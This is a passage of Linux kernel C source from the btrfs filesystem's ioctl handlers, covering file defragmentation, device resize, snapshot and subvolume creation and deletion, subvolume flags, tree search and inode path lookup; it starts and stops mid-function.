if (!isize || start_index > file_end)
return 0;
page_cnt = min_t(u64, (u64)num_pages, (u64)file_end - start_index + 1);
ret = btrfs_delalloc_reserve_space(inode,
page_cnt << PAGE_CACHE_SHIFT);
if (ret)
return ret;
i_done = 0;
tree = &BTRFS_I(inode)->io_tree;
/* step one, lock all the pages */
for (i = 0; i < page_cnt; i++) {
struct page *page;
again:
page = find_or_create_page(inode->i_mapping,
start_index + i, mask);
if (!page)
break;
page_start = page_offset(page);
page_end = page_start + PAGE_CACHE_SIZE - 1;
while (1) {
lock_extent(tree, page_start, page_end);
ordered = btrfs_lookup_ordered_extent(inode,
page_start);
unlock_extent(tree, page_start, page_end);
if (!ordered)
break;
unlock_page(page);
btrfs_start_ordered_extent(inode, ordered, 1);
btrfs_put_ordered_extent(ordered);
lock_page(page);
/*
* we unlocked the page above, so we need check if
* it was released or not.
*/
if (page->mapping != inode->i_mapping) {
unlock_page(page);
page_cache_release(page);
goto again;
}
}
if (!PageUptodate(page)) {
btrfs_readpage(NULL, page);
lock_page(page);
if (!PageUptodate(page)) {
unlock_page(page);
page_cache_release(page);
ret = -EIO;
break;
}
}
if (page->mapping != inode->i_mapping) {
unlock_page(page);
page_cache_release(page);
goto again;
}
pages[i] = page;
i_done++;
}
if (!i_done || ret)
goto out;
if (!(inode->i_sb->s_flags & MS_ACTIVE))
goto out;
/*
* so now we have a nice long stream of locked
* and up to date pages, lets wait on them
*/
for (i = 0; i < i_done; i++)
wait_on_page_writeback(pages[i]);
page_start = page_offset(pages[0]);
page_end = page_offset(pages[i_done - 1]) + PAGE_CACHE_SIZE;
lock_extent_bits(&BTRFS_I(inode)->io_tree,
page_start, page_end - 1, 0, &cached_state);
clear_extent_bit(&BTRFS_I(inode)->io_tree, page_start,
page_end - 1, EXTENT_DIRTY | EXTENT_DELALLOC |
EXTENT_DO_ACCOUNTING | EXTENT_DEFRAG, 0, 0,
&cached_state, GFP_NOFS);
if (i_done != page_cnt) {
spin_lock(&BTRFS_I(inode)->lock);
BTRFS_I(inode)->outstanding_extents++;
spin_unlock(&BTRFS_I(inode)->lock);
btrfs_delalloc_release_space(inode,
(page_cnt - i_done) << PAGE_CACHE_SHIFT);
}
set_extent_defrag(&BTRFS_I(inode)->io_tree, page_start, page_end - 1,
&cached_state, GFP_NOFS);
unlock_extent_cached(&BTRFS_I(inode)->io_tree,
page_start, page_end - 1, &cached_state,
GFP_NOFS);
for (i = 0; i < i_done; i++) {
clear_page_dirty_for_io(pages[i]);
ClearPageChecked(pages[i]);
set_page_extent_mapped(pages[i]);
set_page_dirty(pages[i]);
unlock_page(pages[i]);
page_cache_release(pages[i]);
}
return i_done;
out:
for (i = 0; i < i_done; i++) {
unlock_page(pages[i]);
page_cache_release(pages[i]);
}
btrfs_delalloc_release_space(inode, page_cnt << PAGE_CACHE_SHIFT);
return ret;
}
int btrfs_defrag_file(struct inode *inode, struct file *file,
struct btrfs_ioctl_defrag_range_args *range,
u64 newer_than, unsigned long max_to_defrag)
{
struct btrfs_root *root = BTRFS_I(inode)->root;
struct file_ra_state *ra = NULL;
unsigned long last_index;
u64 isize = i_size_read(inode);
u64 last_len = 0;
u64 skip = 0;
u64 defrag_end = 0;
u64 newer_off = range->start;
unsigned long i;
unsigned long ra_index = 0;
int ret;
int defrag_count = 0;
int compress_type = BTRFS_COMPRESS_ZLIB;
int extent_thresh = range->extent_thresh;
int max_cluster = (256 * 1024) >> PAGE_CACHE_SHIFT;
int cluster = max_cluster;
u64 new_align = ~((u64)128 * 1024 - 1);
struct page **pages = NULL;
if (extent_thresh == 0)
extent_thresh = 256 * 1024;
if (range->flags & BTRFS_DEFRAG_RANGE_COMPRESS) {
if (range->compress_type > BTRFS_COMPRESS_TYPES)
return -EINVAL;
if (range->compress_type)
compress_type = range->compress_type;
}
if (isize == 0)
return 0;
/*
* if we were not given a file, allocate a readahead
* context
*/
if (!file) {
ra = kzalloc(sizeof(*ra), GFP_NOFS);
if (!ra)
return -ENOMEM;
file_ra_state_init(ra, inode->i_mapping);
} else {
ra = &file->f_ra;
}
pages = kmalloc(sizeof(struct page *) * max_cluster,
GFP_NOFS);
if (!pages) {
ret = -ENOMEM;
goto out_ra;
}
/* find the last page to defrag */
if (range->start + range->len > range->start) {
last_index = min_t(u64, isize - 1,
range->start + range->len - 1) >> PAGE_CACHE_SHIFT;
} else {
last_index = (isize - 1) >> PAGE_CACHE_SHIFT;
}
if (newer_than) {
ret = find_new_extents(root, inode, newer_than,
&newer_off, 64 * 1024);
if (!ret) {
range->start = newer_off;
/*
* we always align our defrag to help keep
* the extents in the file evenly spaced
*/
i = (newer_off & new_align) >> PAGE_CACHE_SHIFT;
} else
goto out_ra;
} else {
i = range->start >> PAGE_CACHE_SHIFT;
}
if (!max_to_defrag)
max_to_defrag = last_index + 1;
/*
* make writeback starts from i, so the defrag range can be
* written sequentially.
*/
if (i < inode->i_mapping->writeback_index)
inode->i_mapping->writeback_index = i;
while (i <= last_index && defrag_count < max_to_defrag &&
(i < (i_size_read(inode) + PAGE_CACHE_SIZE - 1) >>
PAGE_CACHE_SHIFT)) {
/*
* make sure we stop running if someone unmounts
* the FS
*/
if (!(inode->i_sb->s_flags & MS_ACTIVE))
break;
if (!should_defrag_range(inode, (u64)i << PAGE_CACHE_SHIFT,
extent_thresh, &last_len, &skip,
&defrag_end, range->flags &
BTRFS_DEFRAG_RANGE_COMPRESS)) {
unsigned long next;
/*
* the should_defrag function tells us how much to skip
* bump our counter by the suggested amount
*/
next = (skip + PAGE_CACHE_SIZE - 1) >> PAGE_CACHE_SHIFT;
i = max(i + 1, next);
continue;
}
if (!newer_than) {
cluster = (PAGE_CACHE_ALIGN(defrag_end) >>
PAGE_CACHE_SHIFT) - i;
cluster = min(cluster, max_cluster);
} else {
cluster = max_cluster;
}
if (range->flags & BTRFS_DEFRAG_RANGE_COMPRESS)
BTRFS_I(inode)->force_compress = compress_type;
if (i + cluster > ra_index) {
ra_index = max(i, ra_index);
btrfs_force_ra(inode->i_mapping, ra, file, ra_index,
cluster);
ra_index += max_cluster;
}
mutex_lock(&inode->i_mutex);
ret = cluster_pages_for_defrag(inode, pages, i, cluster);
if (ret < 0) {
mutex_unlock(&inode->i_mutex);
goto out_ra;
}
defrag_count += ret;
balance_dirty_pages_ratelimited_nr(inode->i_mapping, ret);
mutex_unlock(&inode->i_mutex);
if (newer_than) {
if (newer_off == (u64)-1)
break;
if (ret > 0)
i += ret;
newer_off = max(newer_off + 1,
(u64)i << PAGE_CACHE_SHIFT);
ret = find_new_extents(root, inode,
newer_than, &newer_off,
64 * 1024);
if (!ret) {
range->start = newer_off;
i = (newer_off & new_align) >> PAGE_CACHE_SHIFT;
} else {
break;
}
} else {
if (ret > 0) {
i += ret;
last_len += ret << PAGE_CACHE_SHIFT;
} else {
i++;
last_len = 0;
}
}
}
if ((range->flags & BTRFS_DEFRAG_RANGE_START_IO))
filemap_flush(inode->i_mapping);
if ((range->flags & BTRFS_DEFRAG_RANGE_COMPRESS)) {
/* the filemap_flush will queue IO into the worker threads, but
* we have to make sure the IO is actually started and that
* ordered extents get created before we return
*/
atomic_inc(&root->fs_info->async_submit_draining);
while (atomic_read(&root->fs_info->nr_async_submits) ||
atomic_read(&root->fs_info->async_delalloc_pages)) {
wait_event(root->fs_info->async_submit_wait,
(atomic_read(&root->fs_info->nr_async_submits) == 0 &&
atomic_read(&root->fs_info->async_delalloc_pages) == 0));
}
atomic_dec(&root->fs_info->async_submit_draining);
mutex_lock(&inode->i_mutex);
BTRFS_I(inode)->force_compress = BTRFS_COMPRESS_NONE;
mutex_unlock(&inode->i_mutex);
}
if (range->compress_type == BTRFS_COMPRESS_LZO) {
btrfs_set_fs_incompat(root->fs_info, COMPRESS_LZO);
}
ret = defrag_count;
out_ra:
if (!file)
kfree(ra);
kfree(pages);
return ret;
}
static noinline int btrfs_ioctl_resize(struct file *file,
void __user *arg)
{
u64 new_size;
u64 old_size;
u64 devid = 1;
struct btrfs_root *root = BTRFS_I(fdentry(file)->d_inode)->root;
struct btrfs_ioctl_vol_args *vol_args;
struct btrfs_trans_handle *trans;
struct btrfs_device *device = NULL;
char *sizestr;
char *devstr = NULL;
int ret = 0;
int mod = 0;
if (root->fs_info->sb->s_flags & MS_RDONLY)
return -EROFS;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
ret = mnt_want_write_file(file);
if (ret)
return ret;
if (atomic_xchg(&root->fs_info->mutually_exclusive_operation_running,
1)) {
pr_info("btrfs: dev add/delete/balance/replace/resize operation in progress\n");
return -EINPROGRESS;
}
mutex_lock(&root->fs_info->volume_mutex);
vol_args = memdup_user(arg, sizeof(*vol_args));
if (IS_ERR(vol_args)) {
ret = PTR_ERR(vol_args);
goto out;
}
vol_args->name[BTRFS_PATH_NAME_MAX] = '\0';
sizestr = vol_args->name;
devstr = strchr(sizestr, ':');
if (devstr) {
char *end;
sizestr = devstr + 1;
*devstr = '\0';
devstr = vol_args->name;
devid = simple_strtoull(devstr, &end, 10);
printk(KERN_INFO "btrfs: resizing devid %llu\n",
(unsigned long long)devid);
}
device = btrfs_find_device(root->fs_info, devid, NULL, NULL);
if (!device) {
printk(KERN_INFO "btrfs: resizer unable to find device %llu\n",
(unsigned long long)devid);
ret = -EINVAL;
goto out_free;
}
if (device->fs_devices && device->fs_devices->seeding) {
printk(KERN_INFO "btrfs: resizer unable to apply on "
"seeding device %llu\n",
(unsigned long long)devid);
ret = -EINVAL;
goto out_free;
}
if (!strcmp(sizestr, "max"))
new_size = device->bdev->bd_inode->i_size;
else {
if (sizestr[0] == '-') {
mod = -1;
sizestr++;
} else if (sizestr[0] == '+') {
mod = 1;
sizestr++;
}
new_size = memparse(sizestr, NULL);
if (new_size == 0) {
ret = -EINVAL;
goto out_free;
}
}
if (device->is_tgtdev_for_dev_replace) {
ret = -EINVAL;
goto out_free;
}
old_size = device->total_bytes;
if (mod < 0) {
if (new_size > old_size) {
ret = -EINVAL;
goto out_free;
}
new_size = old_size - new_size;
} else if (mod > 0) {
new_size = old_size + new_size;
}
if (new_size < 256 * 1024 * 1024) {
ret = -EINVAL;
goto out_free;
}
if (new_size > device->bdev->bd_inode->i_size) {
ret = -EFBIG;
goto out_free;
}
do_div(new_size, root->sectorsize);
new_size *= root->sectorsize;
printk_in_rcu(KERN_INFO "btrfs: new size for %s is %llu\n",
rcu_str_deref(device->name),
(unsigned long long)new_size);
if (new_size > old_size) {
trans = btrfs_start_transaction(root, 0);
if (IS_ERR(trans)) {
ret = PTR_ERR(trans);
goto out_free;
}
ret = btrfs_grow_device(trans, device, new_size);
btrfs_commit_transaction(trans, root);
} else if (new_size < old_size) {
ret = btrfs_shrink_device(device, new_size);
} /* equal, nothing need to do */
out_free:
kfree(vol_args);
out:
mutex_unlock(&root->fs_info->volume_mutex);
mnt_drop_write_file(file);
atomic_set(&root->fs_info->mutually_exclusive_operation_running, 0);
return ret;
}
static noinline int btrfs_ioctl_snap_create_transid(struct file *file,
char *name, unsigned long fd, int subvol,
u64 *transid, bool readonly,
struct btrfs_qgroup_inherit **inherit)
{
int namelen;
int ret = 0;
ret = mnt_want_write_file(file);
if (ret)
goto out;
namelen = strlen(name);
if (strchr(name, '/')) {
ret = -EINVAL;
goto out_drop_write;
}
if (name[0] == '.' &&
(namelen == 1 || (name[1] == '.' && namelen == 2))) {
ret = -EEXIST;
goto out_drop_write;
}
if (subvol) {
ret = btrfs_mksubvol(&file->f_path, name, namelen,
NULL, transid, readonly, inherit);
} else {
struct fd src = fdget(fd);
struct inode *src_inode;
if (!src.file) {
ret = -EINVAL;
goto out_drop_write;
}
src_inode = src.file->f_path.dentry->d_inode;
if (src_inode->i_sb != file->f_path.dentry->d_inode->i_sb) {
printk(KERN_INFO "btrfs: Snapshot src from "
"another FS\n");
ret = -EINVAL;
} else {
ret = btrfs_mksubvol(&file->f_path, name, namelen,
BTRFS_I(src_inode)->root,
transid, readonly, inherit);
}
fdput(src);
}
out_drop_write:
mnt_drop_write_file(file);
out:
return ret;
}
static noinline int btrfs_ioctl_snap_create(struct file *file,
void __user *arg, int subvol)
{
struct btrfs_ioctl_vol_args *vol_args;
int ret;
vol_args = memdup_user(arg, sizeof(*vol_args));
if (IS_ERR(vol_args))
return PTR_ERR(vol_args);
vol_args->name[BTRFS_PATH_NAME_MAX] = '\0';
ret = btrfs_ioctl_snap_create_transid(file, vol_args->name,
vol_args->fd, subvol,
NULL, false, NULL);
kfree(vol_args);
return ret;
}
static noinline int btrfs_ioctl_snap_create_v2(struct file *file,
void __user *arg, int subvol)
{
struct btrfs_ioctl_vol_args_v2 *vol_args;
int ret;
u64 transid = 0;
u64 *ptr = NULL;
bool readonly = false;
struct btrfs_qgroup_inherit *inherit = NULL;
vol_args = memdup_user(arg, sizeof(*vol_args));
if (IS_ERR(vol_args))
return PTR_ERR(vol_args);
vol_args->name[BTRFS_SUBVOL_NAME_MAX] = '\0';
if (vol_args->flags &
~(BTRFS_SUBVOL_CREATE_ASYNC | BTRFS_SUBVOL_RDONLY |
BTRFS_SUBVOL_QGROUP_INHERIT)) {
ret = -EOPNOTSUPP;
goto out;
}
if (vol_args->flags & BTRFS_SUBVOL_CREATE_ASYNC)
ptr = &transid;
if (vol_args->flags & BTRFS_SUBVOL_RDONLY)
readonly = true;
if (vol_args->flags & BTRFS_SUBVOL_QGROUP_INHERIT) {
if (vol_args->size > PAGE_CACHE_SIZE) {
ret = -EINVAL;
goto out;
}
inherit = memdup_user(vol_args->qgroup_inherit, vol_args->size);
if (IS_ERR(inherit)) {
ret = PTR_ERR(inherit);
goto out;
}
}
ret = btrfs_ioctl_snap_create_transid(file, vol_args->name,
vol_args->fd, subvol, ptr,
readonly, &inherit);
if (ret == 0 && ptr &&
copy_to_user(arg +
offsetof(struct btrfs_ioctl_vol_args_v2,
transid), ptr, sizeof(*ptr)))
ret = -EFAULT;
out:
kfree(vol_args);
kfree(inherit);
return ret;
}
static noinline int btrfs_ioctl_subvol_getflags(struct file *file,
void __user *arg)
{
struct inode *inode = fdentry(file)->d_inode;
struct btrfs_root *root = BTRFS_I(inode)->root;
int ret = 0;
u64 flags = 0;
if (btrfs_ino(inode) != BTRFS_FIRST_FREE_OBJECTID)
return -EINVAL;
down_read(&root->fs_info->subvol_sem);
if (btrfs_root_readonly(root))
flags |= BTRFS_SUBVOL_RDONLY;
up_read(&root->fs_info->subvol_sem);
if (copy_to_user(arg, &flags, sizeof(flags)))
ret = -EFAULT;
return ret;
}
static noinline int btrfs_ioctl_subvol_setflags(struct file *file,
void __user *arg)
{
struct inode *inode = fdentry(file)->d_inode;
struct btrfs_root *root = BTRFS_I(inode)->root;
struct btrfs_trans_handle *trans;
u64 root_flags;
u64 flags;
int ret = 0;
ret = mnt_want_write_file(file);
if (ret)
goto out;
if (btrfs_ino(inode) != BTRFS_FIRST_FREE_OBJECTID) {
ret = -EINVAL;
goto out_drop_write;
}
if (copy_from_user(&flags, arg, sizeof(flags))) {
ret = -EFAULT;
goto out_drop_write;
}
if (flags & BTRFS_SUBVOL_CREATE_ASYNC) {
ret = -EINVAL;
goto out_drop_write;
}
if (flags & ~BTRFS_SUBVOL_RDONLY) {
ret = -EOPNOTSUPP;
goto out_drop_write;
}
if (!inode_owner_or_capable(inode)) {
ret = -EACCES;
goto out_drop_write;
}
down_write(&root->fs_info->subvol_sem);
/* nothing to do */
if (!!(flags & BTRFS_SUBVOL_RDONLY) == btrfs_root_readonly(root))
goto out_drop_sem;
root_flags = btrfs_root_flags(&root->root_item);
if (flags & BTRFS_SUBVOL_RDONLY)
btrfs_set_root_flags(&root->root_item,
root_flags | BTRFS_ROOT_SUBVOL_RDONLY);
else
btrfs_set_root_flags(&root->root_item,
root_flags & ~BTRFS_ROOT_SUBVOL_RDONLY);
trans = btrfs_start_transaction(root, 1);
if (IS_ERR(trans)) {
ret = PTR_ERR(trans);
goto out_reset;
}
ret = btrfs_update_root(trans, root->fs_info->tree_root,
&root->root_key, &root->root_item);
btrfs_commit_transaction(trans, root);
out_reset:
if (ret)
btrfs_set_root_flags(&root->root_item, root_flags);
out_drop_sem:
up_write(&root->fs_info->subvol_sem);
out_drop_write:
mnt_drop_write_file(file);
out:
return ret;
}
/*
* helper to check if the subvolume references other subvolumes
*/
static noinline int may_destroy_subvol(struct btrfs_root *root)
{
struct btrfs_path *path;
struct btrfs_key key;
int ret;
path = btrfs_alloc_path();
if (!path)
return -ENOMEM;
key.objectid = root->root_key.objectid;
key.type = BTRFS_ROOT_REF_KEY;
key.offset = (u64)-1;
ret = btrfs_search_slot(NULL, root->fs_info->tree_root,
&key, path, 0, 0);
if (ret < 0)
goto out;
BUG_ON(ret == 0);
ret = 0;
if (path->slots[0] > 0) {
path->slots[0]--;
btrfs_item_key_to_cpu(path->nodes[0], &key, path->slots[0]);
if (key.objectid == root->root_key.objectid &&
key.type == BTRFS_ROOT_REF_KEY)
ret = -ENOTEMPTY;
}
out:
btrfs_free_path(path);
return ret;
}
static noinline int key_in_sk(struct btrfs_key *key,
struct btrfs_ioctl_search_key *sk)
{
struct btrfs_key test;
int ret;
test.objectid = sk->min_objectid;
test.type = sk->min_type;
test.offset = sk->min_offset;
ret = btrfs_comp_cpu_keys(key, &test);
if (ret < 0)
return 0;
test.objectid = sk->max_objectid;
test.type = sk->max_type;
test.offset = sk->max_offset;
ret = btrfs_comp_cpu_keys(key, &test);
if (ret > 0)
return 0;
return 1;
}
static noinline int copy_to_sk(struct btrfs_root *root,
struct btrfs_path *path,
struct btrfs_key *key,
struct btrfs_ioctl_search_key *sk,
char *buf,
unsigned long *sk_offset,
int *num_found)
{
u64 found_transid;
struct extent_buffer *leaf;
struct btrfs_ioctl_search_header sh;
unsigned long item_off;
unsigned long item_len;
int nritems;
int i;
int slot;
int ret = 0;
leaf = path->nodes[0];
slot = path->slots[0];
nritems = btrfs_header_nritems(leaf);
if (btrfs_header_generation(leaf) > sk->max_transid) {
i = nritems;
goto advance_key;
}
found_transid = btrfs_header_generation(leaf);
for (i = slot; i < nritems; i++) {
item_off = btrfs_item_ptr_offset(leaf, i);
item_len = btrfs_item_size_nr(leaf, i);
if (item_len > BTRFS_SEARCH_ARGS_BUFSIZE)
item_len = 0;
if (sizeof(sh) + item_len + *sk_offset >
BTRFS_SEARCH_ARGS_BUFSIZE) {
ret = 1;
goto overflow;
}
btrfs_item_key_to_cpu(leaf, key, i);
if (!key_in_sk(key, sk))
continue;
sh.objectid = key->objectid;
sh.offset = key->offset;
sh.type = key->type;
sh.len = item_len;
sh.transid = found_transid;
/* copy search result header */
memcpy(buf + *sk_offset, &sh, sizeof(sh));
*sk_offset += sizeof(sh);
if (item_len) {
char *p = buf + *sk_offset;
/* copy the item */
read_extent_buffer(leaf, p,
item_off, item_len);
*sk_offset += item_len;
}
(*num_found)++;
if (*num_found >= sk->nr_items)
break;
}
advance_key:
ret = 0;
if (key->offset < (u64)-1 && key->offset < sk->max_offset)
key->offset++;
else if (key->type < (u8)-1 && key->type < sk->max_type) {
key->offset = 0;
key->type++;
} else if (key->objectid < (u64)-1 && key->objectid < sk->max_objectid) {
key->offset = 0;
key->type = 0;
key->objectid++;
} else
ret = 1;
overflow:
return ret;
}
static noinline int search_ioctl(struct inode *inode,
struct btrfs_ioctl_search_args *args)
{
struct btrfs_root *root;
struct btrfs_key key;
struct btrfs_key max_key;
struct btrfs_path *path;
struct btrfs_ioctl_search_key *sk = &args->key;
struct btrfs_fs_info *info = BTRFS_I(inode)->root->fs_info;
int ret;
int num_found = 0;
unsigned long sk_offset = 0;
path = btrfs_alloc_path();
if (!path)
return -ENOMEM;
if (sk->tree_id == 0) {
/* search the root of the inode that was passed */
root = BTRFS_I(inode)->root;
} else {
key.objectid = sk->tree_id;
key.type = BTRFS_ROOT_ITEM_KEY;
key.offset = (u64)-1;
root = btrfs_read_fs_root_no_name(info, &key);
if (IS_ERR(root)) {
printk(KERN_ERR "could not find root %llu\n",
sk->tree_id);
btrfs_free_path(path);
return -ENOENT;
}
}
key.objectid = sk->min_objectid;
key.type = sk->min_type;
key.offset = sk->min_offset;
max_key.objectid = sk->max_objectid;
max_key.type = sk->max_type;
max_key.offset = sk->max_offset;
path->keep_locks = 1;
while(1) {
ret = btrfs_search_forward(root, &key, &max_key, path, 0,
sk->min_transid);
if (ret != 0) {
if (ret > 0)
ret = 0;
goto err;
}
ret = copy_to_sk(root, path, &key, sk, args->buf,
&sk_offset, &num_found);
btrfs_release_path(path);
if (ret || num_found >= sk->nr_items)
break;
}
ret = 0;
err:
sk->nr_items = num_found;
btrfs_free_path(path);
return ret;
}
static noinline int btrfs_ioctl_tree_search(struct file *file,
void __user *argp)
{
struct btrfs_ioctl_search_args *args;
struct inode *inode;
int ret;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
args = memdup_user(argp, sizeof(*args));
if (IS_ERR(args))
return PTR_ERR(args);
inode = fdentry(file)->d_inode;
ret = search_ioctl(inode, args);
if (ret == 0 && copy_to_user(argp, args, sizeof(*args)))
ret = -EFAULT;
kfree(args);
return ret;
}
/*
* Search INODE_REFs to identify path name of 'dirid' directory
* in a 'tree_id' tree. and sets path name to 'name'.
*/
static noinline int btrfs_search_path_in_tree(struct btrfs_fs_info *info,
u64 tree_id, u64 dirid, char *name)
{
struct btrfs_root *root;
struct btrfs_key key;
char *ptr;
int ret = -1;
int slot;
int len;
int total_len = 0;
struct btrfs_inode_ref *iref;
struct extent_buffer *l;
struct btrfs_path *path;
if (dirid == BTRFS_FIRST_FREE_OBJECTID) {
name[0]='\0';
return 0;
}
path = btrfs_alloc_path();
if (!path)
return -ENOMEM;
ptr = &name[BTRFS_INO_LOOKUP_PATH_MAX];
key.objectid = tree_id;
key.type = BTRFS_ROOT_ITEM_KEY;
key.offset = (u64)-1;
root = btrfs_read_fs_root_no_name(info, &key);
if (IS_ERR(root)) {
printk(KERN_ERR "could not find root %llu\n", tree_id);
ret = -ENOENT;
goto out;
}
key.objectid = dirid;
key.type = BTRFS_INODE_REF_KEY;
key.offset = (u64)-1;
while(1) {
ret = btrfs_search_slot(NULL, root, &key, path, 0, 0);
if (ret < 0)
goto out;
l = path->nodes[0];
slot = path->slots[0];
if (ret > 0 && slot > 0)
slot--;
btrfs_item_key_to_cpu(l, &key, slot);
if (ret > 0 && (key.objectid != dirid ||
key.type != BTRFS_INODE_REF_KEY)) {
ret = -ENOENT;
goto out;
}
iref = btrfs_item_ptr(l, slot, struct btrfs_inode_ref);
len = btrfs_inode_ref_name_len(l, iref);
ptr -= len + 1;
total_len += len + 1;
if (ptr < name)
goto out;
*(ptr + len) = '/';
read_extent_buffer(l, ptr,(unsigned long)(iref + 1), len);
if (key.offset == BTRFS_FIRST_FREE_OBJECTID)
break;
btrfs_release_path(path);
key.objectid = key.offset;
key.offset = (u64)-1;
dirid = key.objectid;
}
if (ptr < name)
goto out;
memmove(name, ptr, total_len);
name[total_len]='\0';
ret = 0;
out:
btrfs_free_path(path);
return ret;
}
static noinline int btrfs_ioctl_ino_lookup(struct file *file,
void __user *argp)
{
struct btrfs_ioctl_ino_lookup_args *args;
struct inode *inode;
int ret;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
args = memdup_user(argp, sizeof(*args));
if (IS_ERR(args))
return PTR_ERR(args);
inode = fdentry(file)->d_inode;
if (args->treeid == 0)
args->treeid = BTRFS_I(inode)->root->root_key.objectid;
ret = btrfs_search_path_in_tree(BTRFS_I(inode)->root->fs_info,
args->treeid, args->objectid,
args->name);
if (ret == 0 && copy_to_user(argp, args, sizeof(*args)))
ret = -EFAULT;
kfree(args);
return ret;
}
static noinline int btrfs_ioctl_snap_destroy(struct file *file,
void __user *arg)
{
struct dentry *parent = fdentry(file);
struct dentry *dentry;
struct inode *dir = parent->d_inode;
struct inode *inode;
struct btrfs_root *root = BTRFS_I(dir)->root;
struct btrfs_root *dest = NULL;
struct btrfs_ioctl_vol_args *vol_args;
struct btrfs_trans_handle *trans;
int namelen;
int ret;
int err = 0;
vol_args = memdup_user(arg, sizeof(*vol_args));
if (IS_ERR(vol_args))
return PTR_ERR(vol_args);
vol_args->name[BTRFS_PATH_NAME_MAX] = '\0';
namelen = strlen(vol_args->name);
if (strchr(vol_args->name, '/') ||
strncmp(vol_args->name, "..", namelen) == 0) {
err = -EINVAL;
goto out;
}
err = mnt_want_write_file(file);
if (err)
goto out;
mutex_lock_nested(&dir->i_mutex, I_MUTEX_PARENT);
dentry = lookup_one_len(vol_args->name, parent, namelen);
if (IS_ERR(dentry)) {
err = PTR_ERR(dentry);
goto out_unlock_dir;
}
if (!dentry->d_inode) {
err = -ENOENT;
goto out_dput;
}
inode = dentry->d_inode;
dest = BTRFS_I(inode)->root;
if (!capable(CAP_SYS_ADMIN)){
/*
* Regular user. Only allow this with a special mount
* option, when the user has write+exec access to the
* subvol root, and when rmdir(2) would have been
* allowed.
*
* Note that this is _not_ check that the subvol is
* empty or doesn't contain data that we wouldn't
* otherwise be able to delete.
*
* Users who want to delete empty subvols should try
* rmdir(2).
*/
err = -EPERM;
if (!btrfs_test_opt(root, USER_SUBVOL_RM_ALLOWED))
goto out_dput;
/*
* Do not allow deletion if the parent dir is the same
* as the dir to be deleted. That means the ioctl
* must be called on the dentry referencing the root
* of the subvol, not a random directory contained
* within it.
*/
err = -EINVAL;
if (root == dest)
goto out_dput;
err = inode_permission(inode, MAY_WRITE | MAY_EXEC);
if (err)
goto out_dput;
/* check if subvolume may be deleted by a non-root user */
err = btrfs_may_delete(dir, dentry, 1);
if (err)
goto out_dput;
}
if (btrfs_ino(inode) != BTRFS_FIRST_FREE_OBJECTID) {
err = -EINVAL;
goto out_dput;
}
mutex_lock(&inode->i_mutex);
err = d_invalidate(dentry);
if (err)
goto out_unlock;
down_write(&root->fs_info->subvol_sem);
err = may_destroy_subvol(dest);
if (err)
goto out_up_write;
trans = btrfs_start_transaction(root, 0);
if (IS_ERR(trans)) {
err = PTR_ERR(trans);
goto out_up_write;
}
trans->block_rsv = &root->fs_info->global_block_rsv;
ret = btrfs_unlink_subvol(trans, root, dir,
dest->root_key.objectid,
dentry->d_name.name,
dentry->d_name.len);
if (ret) {
err = ret;
btrfs_abort_transaction(trans, root, ret);
goto out_end_trans;
}
btrfs_record_root_in_trans(trans, dest);
memset(&dest->root_item.drop_progress, 0,
sizeof(dest->root_item.drop_progress));
dest->root_item.drop_level = 0;
btrfs_set_root_refs(&dest->root_item, 0);
if (!xchg(&dest->orphan_item_inserted, 1)) {
ret = btrfs_insert_orphan_item(trans,
root->fs_info->tree_root,
dest->root_key.objectid);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
err = ret;
goto out_end_trans;
}
}
out_end_trans:
ret = btrfs_end_transaction(trans, root);
if (ret && !err)
err = ret;
inode->i_flags |= S_DEAD;
out_up_write:
up_write(&root->fs_info->subvol_sem);
out_unlock:
mutex_unlock(&inode->i_mutex);
if (!err) {
shrink_dcache_sb(root->fs_info->sb);
btrfs_invalidate_inodes(dest);
d_delete(dentry);
}
out_dput:
dput(dentry);
out_unlock_dir:
mutex_unlock(&dir->i_mutex);
mnt_drop_write_file(file);
out:
kfree(vol_args);
return err;
}
static int btrfs_ioctl_defrag(struct file *file, void __user *argp)
{
struct inode *inode = fdentry(file)->d_inode;
struct btrfs_root *root = BTRFS_I(inode)->root;
struct btrfs_ioctl_defrag_range_args *range;
int ret;
if (btrfs_root_readonly(root))
return -EROFS;
if (atomic_xchg(&root->fs_info->mutually_exclusive_operation_running,
1)) {
pr_info("btrfs: dev add/delete/balance/replace/resize operation in progress\n");
return -EINPROGRESS;
}
ret = mnt_want_write_file(file);
if (ret) {
atomic_set(&root->fs_info->mutually_exclusive_operation_running,
0);
return ret;
}
switch (inode->i_mode & S_IFMT) {
case S_IFDIR:
if (!capable(CAP_SYS_ADMIN)) {
ret = -EPERM;
goto out;
}
ret = btrfs_defrag_root(root, 0);
if (ret)
goto out;
ret = btrfs_defrag_root(root->fs_info->extent_root, 0);
break;
case S_IFREG:
if (!(file->f_mode & FMODE_WRITE)) {
ret = -EINVAL;
goto out;
}
range = kzalloc(sizeof(*range), GFP_KERNEL);
if (!range) {
ret = -ENOMEM;
goto out;
}
if (argp) {
if (copy_from_user(range, argp,
sizeof(*range))) {
ret = -EFAULT;
kfree(range);
goto out;
}
/* compression requires us to start the IO */
if ((range->flags & BTRFS_DEFRAG_RANGE_COMPRESS)) {
range->flags |= BTRFS_DEFRAG_RANGE_START_IO;
range->extent_thresh = (u32)-1;
}
} else {
/* the rest are all set to zero by kzalloc */
range->len = (u64)-1;
}
ret = btrfs_defrag_file(fdentry(file)->d_inode, file,
range, 0, 0);
if (ret > 0)
ret = 0;
kfree(range);
break;
default:
ret = -EINVAL;
}
out:
mnt_drop_write_file(file);
atomic_set(&root->fs_info->mutually_exclusive_operation_running, 0);
return ret;
}
static long btrfs_ioctl_add_dev(struct btrfs_root *root, void __user *arg)
{
struct btrfs_ioctl_vol_args *vol_args;
int ret;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
if (atomic_xchg(&root->fs_info->mutually_exclusive_operation_running,
1)) {
pr_info("btrfs: dev add/delete/balance/replace/resize operation in progress\n");
return -EINPROGRESS;
}
mutex_lock(&root->fs_info->volume_mutex);
vol_args = memdup_user(arg, sizeof(*vol_args));
if (IS_ERR(vol_args)) {
ret = PTR_ERR(vol_args);
goto out;
}
vol_args->name[BTRFS_PATH_NAME_MAX] = '\0';
ret = btrfs_init_new_device(root, vol_args->name);
kfree(vol_args);
out:
mutex_unlock(&root->fs_info->volume_mutex);
atomic_set(&root->fs_info->mutually_exclusive_operation_running, 0);
return ret;
}
static long btrfs_ioctl_rm_dev(struct file *file, void __user *arg)
{
